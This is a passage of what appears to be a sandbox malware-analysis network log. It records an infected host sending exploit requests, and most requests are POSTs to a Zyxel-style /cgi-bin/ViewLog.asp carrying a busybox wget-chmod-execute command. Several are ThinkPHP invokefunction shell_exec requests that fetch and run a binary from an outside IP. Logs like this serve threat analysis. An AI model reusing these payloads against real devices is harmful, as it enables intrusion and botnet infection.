                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      668192.168.2.153637262.29.43.08080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:25.304790020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      669192.168.2.155099894.120.61.518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:25.306183100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      670192.168.2.154933894.226.88.1888080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:25.531517029 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:25.910685062 CET218INHTTP/1.0 500 Internal Server Error
                                                      Date: Wed, 14 Feb 2024 08:30:25 GMT
                                                      Server: Apache/2.4.7 (Ubuntu)
                                                      X-Powered-By: PHP/5.5.9-1ubuntu4.22
                                                      Content-Length: 0
                                                      Connection: close
                                                      Content-Type: text/html


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      671192.168.2.154874494.123.91.348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:25.553505898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      672192.168.2.1551534119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:25.633932114 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:56Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      673192.168.2.155263688.221.127.19780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:26.255701065 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:26.458406925 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:26 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:26 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 35 66 32 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 36 26 23 34 36 3b 32 34 36 34 64 38 65 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c5f21602&#46;1707899426&#46;2464d8eb</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      674192.168.2.155367088.221.4.17680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:26.259208918 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:26.472568989 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:26 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:26 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 65 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 36 26 23 34 36 3b 31 66 30 62 34 33 66 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;7ee6655f&#46;1707899426&#46;1f0b43f9</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      675192.168.2.154247288.218.138.4280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:26.278523922 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:26.503737926 CET322INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:18 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      676192.168.2.153442088.198.144.14280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:26.486089945 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:26.695329905 CET621INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:26 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 150
                                                      Connection: close
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-XSS-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      Referrer-Policy: no-referrer-when-downgrade
                                                      Content-Security-Policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      677192.168.2.1551484119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:27.629961967 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:58Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      678192.168.2.1551596119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:28.325840950 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:59Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      679192.168.2.1551626119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.014034986 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:59Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      680192.168.2.155506631.136.74.918080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.043401957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:32.088351011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.232131958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:50.263792992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.119127989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:05.269907951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      681192.168.2.154232831.136.157.2348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.043487072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:32.088407040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.232146978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:50.263816118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.119214058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:05.269855022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      682192.168.2.155436485.214.112.1648080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.052558899 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      683192.168.2.156083662.171.190.2478080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.053514004 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
